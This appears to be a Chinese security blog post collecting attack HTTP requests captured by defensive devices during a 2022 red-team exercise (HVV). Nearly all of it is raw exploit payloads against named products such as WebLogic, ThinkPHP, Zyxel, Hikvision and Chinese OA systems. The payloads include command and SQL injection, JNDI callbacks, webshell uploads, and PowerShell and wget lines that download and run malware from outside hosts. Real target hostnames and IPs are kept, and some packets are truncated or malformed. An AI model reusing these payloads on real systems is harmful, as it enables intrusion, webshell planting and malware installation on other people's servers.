masker: 2022年的HVV期间抓到的一部分payload

以下所有内容都是在各种安全设备的后台记录到的数据包（不含敏感信息，实际也是攻击失败的），后面的部分留空表示会继续更新（也可能不会再更新）

=============================================================

蓝凌前台代码执行漏洞，该漏洞是未公开漏洞(S3100028163)

POST /data/sys-common/treexml.tmpl HTTP/1.1

User-Agent:Mozilla/4.0 (compatible, MSIE 7.0, Windows NT 5.1, 360SE)

Host:vpn.dongfeng-nissan.com.cn

Content-Type:application/x-www-form-urlencoded

Content-Length:168

s_bean=ruleFormulaValidate&script=try {String cmd = "ping www.baidu.com";Process child = Runtime.getRuntime().exec(cmd);} catch (IOException e) {System.err.println(e);}

=============================================================

FastJson 漏洞利用

POST / HTTP/1.1

User-Agent:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; TencentTraveler 4.0)

Host:test.dongfeng-nissan.com.cn

Content-Type:application/json; charset=utf-8

Content-Length:115

{

"@type":"org.apache.shiro.jndi.JndiObjectFactory",

"resourceName":"rmi://qNWA2Gls.dflqxk.ceye.io/Exploit"

}

===============================================================

fastjson(S2019010052)

POST / HTTP/1.1

User-Agent:Mozilla/5.0 (Windows NT 6.1; rv,2.0.1) Gecko/20100101 Firefox/4.0.1

Host:test.dongfeng-nissan.com.cn

Content-Type:application/json; charset=utf-8

Content-Length:258

{

"a":{

"@type":"java.lang.Class",

"val":"com.sun.rowset.JdbcRowSetImpl"

"b":{

"@type":"com.sun.rowset.JdbcRowSetImpl",

"dataSourceName":"rmi://5ltnibIi.dflqxk.ceye.io/Exploit",

"autoCommit":true

}

==============================================================

亿邮eyou 远程代码执行(S3000009837)

POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1

User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0

Host:test.dongfeng-nissan.com.cn

Content-Type:application/x-www-form-urlencoded

Content-Length:25

type='|cat /etc/passwd||'

==============================================================

齐治堡垒机SQL注入漏洞

GET /audit/gui_detail_view.php?token=1&id=\&uid=,chr(97)) or 1: print chr(121)+chr(101)+chr(115)

#&login=shterm HTTP/1.1

User-Agent:Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv,2.0.1) Gecko/20100101 Firefox/4.0.1

Host:test.dongfeng-nissan.com.cn

Content-Length:0

==============================================================

泛微OA E-cology 文件上传 (/page/exportImport/uploadOperation.jsp)(S3100023488)

POST /page/exportImport/uploadOperation.jsp HTTP/1.1

User-Agent:Mozilla/4.0 (compatible, MSIE 8.0, Windows NT 6.0, Trident/4.0)

Host:test.dongfeng-nissan.com.cn

Content-Type:multipart/form-data; boundary=b0d829daa06c13d6b3e16b0ad21d1eed

Content-Length:288

--b0d829daa06c13d6b3e16b0ad21d1eed

Content-Disposition: form-data; name="file"; filename="pwue.jsp"

Content-Type: application/octet-stream

<%out.print(40536 * 44175);new java.io.File(application.getRealPath(request.getServletPath())).delete();%>

--b0d829daa06c13d6b3e16b0ad21d1eed--

==============================================================

泛微OA9 前台任意文件上传(S3000009793)

POST /page/exportImport/uploadOperation.jsp HTTP/1.1

User-Agent:Mozilla/4.0 (compatible, MSIE 8.0, Windows NT 6.0, Trident/4.0)

Host:test.dongfeng-nissan.com.cn

Content-Type:multipart/form-data; boundary=b0d829daa06c13d6b3e16b0ad21d1eed

Content-Length:288

--b0d829daa06c13d6b3e16b0ad21d1eed

Content-Disposition: form-data; name="file"; filename="pwue.jsp"

Content-Type: application/octet-stream

<%out.print(40536 * 44175);new java.io.File(application.getRealPath(request.getServletPath())).delete();%>

--b0d829daa06c13d6b3e16b0ad21d1eed--

==============================================================

通达OA v11.7 auth_mobi.php任意用户登录漏洞(S3100028588)

GET /mobile/auth_mobi.php?isAvatar=1&uid=11121212121212&P_VER=0 HTTP/1.1

User-Agent:Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv,2.0.1) Gecko/20100101 Firefox/4.0.1

Host:test.dongfeng-nissan.com.cn

Content-Length:0

==============================================================

通达OA文件包含(S2020010015)

POST /ispirit/interface/gateway.php HTTP/1.1

User-Agent:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; The World)

Host:preview.dongfeng-nissan.com.cn

Content-Type:application/x-www-form-urlencoded

Content-Length:43

json={"url":"/general/../../mysql5/my.ini"}

==============================================================

通达OA办公系统 report_bi.func.php 文件 dataset_id 参数 SQL注入漏洞(S3100023434)

POST /general/bi_design/appcenter/report_bi.func.php HTTP/1.1

User-Agent:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; TencentTraveler 4.0)

Host:preview.dongfeng-nissan.com.cn

Content-Type:application/x-www-form-urlencoded

Content-Length:113

_POST[dataset_id]=efgh%27-%40%60%27%60%29union+select+database%28%29%2C2%2Cuser%28%29%23%27&action=get_link_info&

==============================================================

ThinkCMF 任意内容包含漏洞(S2020091501)

GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1

Host:202.96.191.173:80

User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36

Content-Type:application/json

Accept-Encoding:gzip

Connection:close

==============================================================

用友 GRP-u8 SQL 注入, 可执行命令(S3000009903)

POST /Proxy HTTP/1.1

User-Agent:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Maxthon 2.0)

Host:preview.dongfeng-nissan.com.cn

Content-Type:application/x-www-form-urlencoded

Content-Length:348

cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION> <NAME>AS_DataRequest</NAME><PARAMS><PARAM> <NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM> <NAME>Data</NAME><DATA format="text">select @@version</DATA></PARAM></PARAMS> </R9FUNCTION></R9PACKET>

==============================================================

锐捷 EWEB 远程代码执行(S2120090999)

POST /guest_auth/guestIsUp.php HTTP/1.1

User-Agent:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Maxthon 2.0)

Host:preview.dongfeng-nissan.com.cn

Content-Type:application/x-www-form-urlencoded

Content-Length:63

mac=1&ip=127.0.0.1|echo 'wkuqchdkhiuasborjbtn' > rqoojwfuwo.txt

==============================================================

Coremail爆出漏洞可以直接读取配置(S2019010019)

GET /mailsms/s?func=ADMIN:appState&dumpConfig=/ HTTP/1.1

User-Agent:Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv,2.0.1) Gecko/20100101 Firefox/4.0.1

Host:preview.dongfeng-nissan.com.cn

Content-Length:0

==============================================================

ShopXO 任意文件读取漏洞(CNVD-2021-15822)(S3100024378)

GET /public/index.php?s=/index/qrcode/download/url/L1dpbmRvd3Mvd2luLmluaQ= HTTP/1.1

User-Agent:Mozilla/4.0 (compatible, MSIE 7.0, Windows NT 5.1, 360SE)

Host:preview.dongfeng-nissan.com.cn

Content-Length:0

==============================================================

Zyxel防火墙命令注入漏洞(CVE-2022-30525)(S3100024936)

POST /ztp/cgi-bin/handler HTTP/1.1

User-Agent:Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv,2.0.1) Gecko/20100101 Firefox/4.0.1

Host:vpn.dongfeng-nissan.com.cn

Content-Type:application/json

Content-Length:142

{"command":"setWanPortSt","proto":"dhcp","port":"4","vlan_tagged":"1","vlanid":"5","mtu":"; curl http://Z2i9EVbB.dflqxk.ceye.io;","data":"hi"}

==============================================================

Weblogic漏洞利用或扫描(D11236926c9)

GET /_async/AsyncResponseService HTTP/1.1

Host:erp-ct.dfsouth.com

User-Agent:Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:16.0) Gecko/20100101 Firefox/16.0

Accept:*/*

Connection:keep-alive

==============================================================

Dynamicweb云电子商务系统未授权添加用户漏洞(CVE-2022-25369)

GET /Admin/Access/Setup/Default.aspx?Action=createadministrator&adminusername={{rand_base(6)}}&adminpassword={{rand_base(6)}}&adminemail=test@test.com&adminname=test HTTP/1.1

User-Agent:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Maxthon 2.0)

Host:vpn.dongfeng-nissan.com.cn

Content-Length:0

==============================================================

ThinkPHP 5.x 远程代码执行(S2020091901)

GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1

Host:202.96.191.161:80

User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36

Accept-Encoding:gzip

Connection:close

==============================================================

Apache HTTP Server 远程命令执行(CVE-2021-41773)(S3000010931)

POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1

Host:202.96.191.161:80

User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36

Content-Length:33

Content-Type:application/x-www-form-urlencoded

Accept-Encoding:gzip

Connection:close

==============================================================

XML外部实体注入(D111751fdae)

POST /Autodiscover/Autodiscover.xml HTTP/1.1

Host:58.248.167.75:80

User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36

Content-Length:314

Content-Type:application/xml

Accept-Encoding:gzip

Connection:close

<!DOCTYPE xxe [

<!ELEMENT name ANY >

<!ENTITY xxe SYSTEM "file:///etc/passwd">]>

<EMailAddress>aaaaa</EMailAddress>

</Request>

</Autodiscover>

==============================================================

WebLogic反序列化远程代码执行漏洞（CVE-2019-2725）(S2020041008)

POST /_async/AsyncResponseService HTTP/1.1

Connection:Keep-Alive

Content-Type:text/xml; Charset=UTF-8

Accept:*/*

Accept-Language:zh-cn

Referer:http://202.96.191.232:7001/_async/AsyncResponseService

User-Agent:Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)

cmd:powershell (new-object System.Net.WebClient).DownloadFile('http://cb.fuckingmy.life/download.exe','%SystemRoot%/Temp/fdhuwgnzqjakuvg19698.exe');start %SystemRoot%/Temp/fdhuwgnzqjakuvg19698.exe

Content-Length:206204

Host:202.96.191.232:7001

<?xml version="1.0" encoding="utf-8" ?>

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"

xmlns:wsa="http://www.w3.org/2005/08/addressing"

xmlns:asy="http://www.bea.com/async/AsyncResponseService">

<soapenv:Header> <wsa:Action/><wsa:RelatesTo/><asy:onAsyncDelivery/>

<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">

<class><string>oracle.toplink.internal.sessions.UnitOfWorkChangeSet</string><void>

--------------------------------------------------------------------------------------------------------

POST /_async/AsyncResponseService HTTP/1.1

Connection:Keep-Alive

Content-Type:text/xml; Charset=UTF-8

Accept:*/*

Accept-Language:zh-cn

Referer:http://202.96.191.185:7001/_async/AsyncResponseService

User-Agent:Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)

Upgrade-Insecure-Requests:1

Content-Length:913

Host:202.96.191.185:7001

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">

<soapenv:Header>

<wsa:Action>xx</wsa:Action>

<wsa:RelatesTo>xx</wsa:RelatesTo>

<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">

</void>

</void>

<string>powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','%SystemRoot%/Temp/jnfkcgqimewoglq2347.exe');start %SystemRoot%/Temp/jnfkcgqimewoglq2347.exe</string>

</void>

</array>

</work:WorkContext>

</soapenv:Header>

<soapenv:Body>

<asy:onAsyncDelivery/>

</soapenv:Body></soapenv:Envelope>

----------------------------------------------------------------------------------

POST /_async/AsyncResponseService HTTP/1.1

Connection:Keep-Alive

Content-Type:text/xml; Charset=UTF-8

Accept:*/*

Accept-Language:zh-cn

Referer:http://202.96.191.185:7001/_async/AsyncResponseService

User-Agent:Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)

Upgrade-Insecure-Requests:1

Content-Length:915

Host:202.96.191.185:7001

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">

<soapenv:Header>

<wsa:Action>xx</wsa:Action>

<wsa:RelatesTo>xx</wsa:RelatesTo>

<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">

</void>

</void>

<string>powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','%SystemRoot%/Temp/hqugkeyrxkrllzg26646.exe');start %SystemRoot%/Temp/hqugkeyrxkrllzg26646.exe</string>

</void>

</array>

</work:WorkContext>

</soapenv:Header>

<soapenv:Body>

<asy:onAsyncDelivery/>

</soapenv:Body></soapenv:Envelope>

==============================================================

WebLogic 权限绕过(CVE-2020-14883)(S2020102903)

POST /console/images/%252e%252e%252fconsole.portal HTTP/1.1

Host:210.21.81.137:7001

User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36

Connection:close

Content-Length:157

Content-Type:application/x-www-form-urlencoded

Accept-Encoding:gzip

_nfpb=true&_pageLabel=HomePage1&handle=com.bea.core.repackaged.springframework.context.support.ClassPathXmlApplicationContext("http://178.20.40.200/wbw.xml")

==============================================================

WebLogic反序列化远程代码执行漏洞（CVE-2017-10271）(S3000008711)

POST /_async/AsyncResponseService HTTP/1.1

Connection:Keep-Alive

Content-Type:text/xml; Charset=UTF-8

Accept:*/*

Accept-Language:zh-cn

Referer:http://202.96.191.185:7001/_async/AsyncResponseService

User-Agent:Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)

Upgrade-Insecure-Requests:1

Content-Length:913

Host:202.96.191.185:7001

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">

<soapenv:Header>

<wsa:Action>xx</wsa:Action>

<wsa:RelatesTo>xx</wsa:RelatesTo>

<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">

</void>

</void>

</void>

</array>

</work:WorkContext>

</soapenv:Header>

<soapenv:Body>

<asy:onAsyncDelivery/>

</soapenv:Body></soapenv:Envelope>

==============================================================

使用CVE-2021-36260漏洞对海康威视发起攻击尝试(S3000011160)

PUT /SDK/webLanguage HTTP/1.1

Host:202.96.191.232:81

User-Agent:Go-http-client/1.1

Content-Length:102

Accept:*/*

Accept-Encoding:gzip, deflate

Accept-Language:en-US,en;q=0.9,sv;q=0.8

Content-Type:application/x-www-form-urlencoded; charset=UTF-8

X-Requested-With:XMLHttpRequest

<?xml version="1.0" encoding="UTF-8"?><language>$(cd /tmp/ && cd /var/tmp/ && cd /var/run/)</language>

==============================================================

ThinkPHP 远程代码执行(S2020060403)

GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^<?php%20$action%20=%20$_GET['xcmd'];system($action);?^>>hydra.php HTTP/1.1

Connection:Keep-Alive

Accept:*/*

Accept-Language:zh-cn

Referer:http://210.21.81.157:8087/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^<?php $action = $_GET['xcmd'];system($action);?^>>hydra.php

User-Agent:Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host:210.21.81.157:8087

==============================================================

Elasticsearch未授权访问(S3100024705)

GET /_cat/indices?format=json&h=index HTTP/1.1

Host:202.96.191.232:9200

Accept:*/*

Accept-Encoding:gzip, deflate, br

Connection:keep-alive

User-Agent:python-httpx/0.21.1

==============================================================

Shenzhen TVT Digital Technology Co. Ltd & OEM {DVR/NVR/IPC} API 远程命令执行(S3100024329)

POST /editBlackAndWhiteList HTTP/1.1

Accept-Encoding:identity

Content-Length:644

Accept-Language:en-us

Host:202.96.191.232:90

Accept:*/*

User-Agent:Mozila/5.0

Connection:close

Cache-Control:max-age=0

Content-Type:text/xml

Authorization:Basic YWRtaW46ezEyMjEzQkQxLTY5QzctNDg2Mi04NDNELTI2MDUwMEQxREE0MH0=

<?xml version="1.0" encoding="utf-8"?><request version="1.0" systemType="NVMS-9000" clientType="WEB"><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type="filterTypeMode">refuse</filterType><filterList type="list"><itemType><addressType type="addressType"/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(cd${IFS}/tmp;wget${IFS}http://92.118.230.134/garm7${IFS}-O-${IFS}>GSec;chmod${IFS}777${IFS}GSec;./GSec${IFS}tvt)</ip></item></filterList></content></request>

==============================================================

XXL-JOB未授权远程代码执行漏洞(S3100023062)

POST /run HTTP/1.1

Host:202.96.191.232:9999

User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0

Content-Length:334

Accept:*/*

Accept-Language:en-US,en;q=0.5

Connection:close

Content-Type:application/json

Accept-Encoding:gzip

Connection:close

{

"jobId": 1,

"executorHandler": "demoJobHandler",

"executorParams": "demoJobHandler",

"executorBlockStrategy": "COVER_EARLY",

"executorTimeout": 0,

"logId": 1,

"logDateTime": 1586629003729,

"glueType": "GLUE_SHELL",

"glueSource": "calc",

"glueUpdatetime": 1658940033024,

"broadcastIndex": 0,

"broadcastTotal": 0

}

==============================================================

中远麒麟 iAudit堡垒机远程命令执行漏洞(get_luser_by_sshport.php)(S3100023318)

GET /get_luser_by_sshport.php?clientip=1;echo%20"<?php%20echo%20md5(ocuswpeelc);unlink(__FILE__);?>">/opt/freesvr/web/htdocs/freesvr/audit/ocuswpeelc.php;&clientport=1 HTTP/1.1

Host:210.21.81.165

User-Agent:Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1468.0 Safari/537.36

Accept-Encoding:gzip

==============================================================

奇安信NS-NGFW网康防火墙前台远程代码执行(S3000009856)

POST /directdata/direct/router HTTP/1.1

Host:202.96.191.135

User-Agent:Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1468.0 Safari/537.36

Content-Length:200

Content-Type:application/x-www-form-urlencoded

Accept-Encoding:gzip

{"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":["/var/www/html/d.txt;echo '<?php echo md5(tcynfdguxq);unlink(__FILE__);?>' >/var/www/html/tcynfdguxq.php"]}],"type":"rpc","tid":17}

==============================================================

Jenkins远程代码执行（CVE-2019-1003000）(S2020070703)

GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27test%27,%20root=%27http://aaa%27)%0a@Grab(group=%27package%27,%20module=%27sqqx%27,%20version=%271%27)%0aimport%20Payload; HTTP/1.1

Host:202.96.191.135

User-Agent:Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1468.0 Safari/537.36

Accept-Encoding:gzip

==============================================================

检测到针对用友U8 OA test.jsp的SQL注入漏洞攻击(S3000009930)

GET /yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20md5(204218669)) HTTP/1.1

Host:202.96.191.135

User-Agent:Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1468.0 Safari/537.36

Accept-Encoding:gzip

==============================================================

用友时空KSOA软件前台文件上传漏洞，该漏洞是未公开漏洞(S3100028170)

POST /servlet/com.sksoft.bill.ImageUpload?filepath=/&filename=9693326082.jsp HTTP/1.1

Host:mam.dongfeng-nissan.com.cn

User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36

Content-Length:171

Accept:*/*

Connection:close

<% out.println(new String(new sun.misc.BASE64Decoder().decodeBuffer("OTY5MzMyNjA4Mg=="))); new java.io.File(application.getRealPath(request.getServletPath())).delete(); %>

==============================================================

用友NC 文件上传漏洞，该漏洞在检测发布时处于0day状态，未找到对应补丁。(S3100029010)

POST /aim/equipmap/accept.jsp HTTP/1.1

Host:202.96.191.196

User-Agent:python-requests/2.28.0

Accept-Encoding:gzip, deflate

Accept:*/*

Connection:keep-alive

Content-Type:multipart/form-data; boundary=---------------------------16314487820932200903769468567

Content-Length:535

-----------------------------16314487820932200903769468567

Content-Disposition: form-data; name="upload"; filename="222222.txt"

Content-Type: text/plain

<%out.println("bea86d66a5278f9e6fa1112d2e2fcebf");%>

-----------------------------16314487820932200903769468567

Content-Disposition: form-data; name="fname"

\webapps

c_web80900fd668c51631353aca37fc1f829.jsp

-----------------------------16314487820932200903769468567--

==============================================================

泛微E-office do_excel.php任意文件写入漏洞

poc

POST /www/general/charge/charge_list/do_excel.php HTTP/1.1

Host:xxx.com

User-Agent:Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0

Content-Length:34

Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Content-Type:application/x-www-form-urlencoded

Referer:http://www.baidu.com/

Accept-Encoding:gzip

html=<?php system($_POST[pass]);?>

==============================================================

泛微E-cology文件上传漏洞

影响产品:8.0/9.0 10.47以下和其他版本

利用状态:在野利用

背景描述:泛微E-cology文件上传漏洞。

漏洞详情:先发包上传

POST /workrelate/plan/util/uploaderOperate.jsp HTTP/1.1

Host: target

Accept: */*

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Content-Type: multipart/form-data; boundary=---------------------------34533880461293314163770424843

Accept-Encoding:gzip

Dnt: 1

Sec-Fetch-Dest: empty

Sec-Fetch-Mode: cors

Sec-Fetch-Site: same-site

Te: trailers

Connection: close

Content-Length: 437

-----------------------------34533880461293314163770424843

Content-Disposition: form-data; name="secId"

Content-Type: text/plain

-----------------------------34533880461293314163770424843

Content-Disposition: form-data; name="Filedata"; filename="log.txt"

success

-----------------------------34533880461293314163770424843

Content-Disposition: form-data; name="plandetailid"

-----------------------------34533880461293314163770424843--

将文件释放至跟网站根路径下在数据包中将 fileid 替换

POST /OfficeServer HTTP/1.1

Host: target

Accept: */*

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Content-Type: multipart/form-data; boundary=---------------------------34533880461293314163770424843

Accept-Encoding:gzip

Dnt: 1

Sec-Fetch-Dest: empty

Sec-Fetch-Mode: cors

Sec-Fetch-Site: same-site

Te: trailers

Connection: close

Content-Length: 437

-----------------------------34533880461293314163770424843

Content-Disposition: form-data; name="success"

{'OPTION':'INSERTIMAGE','isInsertImageNew':'1','imagefileid4pic':'1015543'}

-----------------------------34533880461293314163770424843--

==============================================================

(疑似0day)用友NC 6.5文件上传漏洞，该漏洞在检测发布时处于0day状态，未找到对应补丁。(S3100029005)

POST /uapim/upload/grouptemplet?groupid=2&fileType=jsp HTTP/1.1

Host:202.96.191.196

User-Agent:Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0

Accept-Encoding:gzip, deflate

Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8

Connection:close

Content-Type:multipart/form-data; boundary=----WebKitFormBoundarymMgLJdk18SQHBnpj

Content-Length:304

------WebKitFormBoundarymMgLJdk18SQHBnpj

Content-Disposition: form-data; name="upload"; filename="whoami.jsp"

Content-Type: application/octet-stream

TEST123

------WebKitFormBoundarymMgLJdk18SQHBnpj

Content-Disposition: form-data; name="submit"

submit

------WebKitFormBoundarymMgLJdk18SQHBnpj--

======================================================

masker

2022年7月27日星期三

2022年的HVV期间抓到的一部分payload

没有评论:

发表评论